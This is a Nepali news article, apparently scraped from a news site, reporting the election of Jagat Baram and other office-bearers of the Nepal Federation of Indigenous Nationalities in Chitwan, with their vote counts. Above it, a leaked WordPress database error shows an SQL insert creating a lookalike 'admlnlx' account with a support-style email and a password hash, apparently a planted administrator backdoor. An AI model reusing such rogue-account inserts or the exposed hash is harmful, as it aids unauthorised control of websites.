WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bipu2JBCnPObwJx.yd/K7W266KqV9i0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 05:19:17', '', 'admlnlx', 'admlnlx')
चितवन, पुस ६–
चितवनको नारायणगढमा भएको नेपाल आदिवासी जनजाति महासंघको नवौं राष्ट्रिय महाधिवेशनबाट अध्यक्षमा जगत बराम निर्वाचित हुनु भएको छ । गयराती भएको निर्वाचनमा कुल ३१ मतका साथ बराम अध्यक्षमा निर्वाचित हुनु भएको हो । अध्यक्षका प्रत्यासी सूर्य भुजेलले २३ मत प्राप्त गरे । अध्यक्षमा विजयी बराम नेपाली काँग्रेस निकट मानिन्छन् । उनलाई माओवादी, संघीय समाजवादी फोरमलगायतका निकट जनजातिहरुको समर्थन रहेको थियो । भुजेल भने एमाले निकटका मानिन्छन् ।
यस्तै उपाध्यक्षमा खुल्ला तर्फ किरण सुनुवार (३३), गोविन्द छन्त्याल (२८), लोकबहादुर दुरा (२७), गणेशलाल थकाली (२६), नविन रोका मगर (२६), सोनाम लामा वालुङ (२४), श्यामप्रसाद मण्डल (२३) र महिला उपाध्यक्षमा कृष्णकुमारी शेरचन (३६) मतका साथ विजयी हुनुभएको छ । महिलासहित ८ उपाध्यक्षका लागि १६ जनाको उम्मेदवारी परेको थियो ।
यसैगरि महासंघमा महासचिवमा नित्यानन्द ताजपुरिया (३७) मतका साथ विजयी हुनुभएको छ । उहाँका निकटम प्रतिद्धन्द्धी टासी ह्याल्मो (१५) मत मात्रै ल्याए ।
यसैगरि पाँच जना सचिवमा आङ पासाङ शेर्पा (३२), गोपाल माझी (२६), दानसिंह राउटे (२२), सुखवीर थानी (२१), राजकुमार बोटे (२०) मत ल्याई विजयी हुनुभयो । सचिव पदमा ९ जनाको उम्मेदवारी परेको थियो ।
महिला सचिवहरुमा श्रतिमाया कुमाल (३९), शान्तिदेवी धिमाल (३५), सकुमती राजवंशी (३३), लाक्पा हिले शेर्पा (३०) मत प्राप्त गरि विजयी हुनुभयो ।
त्यसैगरि कोषाध्यक्षमा मुकुन्द बहादुर पहारी (३८) मतका साथ विजयी हुनुभयो । उहाँका निकटम प्रतिद्धन्द्ध प्रेमीलाल प्रसाद चौधरी (१५) मत मात्रै प्राप्त गर्नुभयो ।
निर्वाचनमा कुल ५६ मध्ये ५४ मत मात्रै खसेको थियो । निर्वाचित कार्यसमितिलाई विहानै सपथ ग्रहण गराईएको निर्वाचन समितिका मनोज घर्ती मगरले जानकारी दिनुभयो । यसपटक विधान संशोधनगरि १३ सदस्यीय समितिलाई १९ सदस्यीय बनाइएको छ ।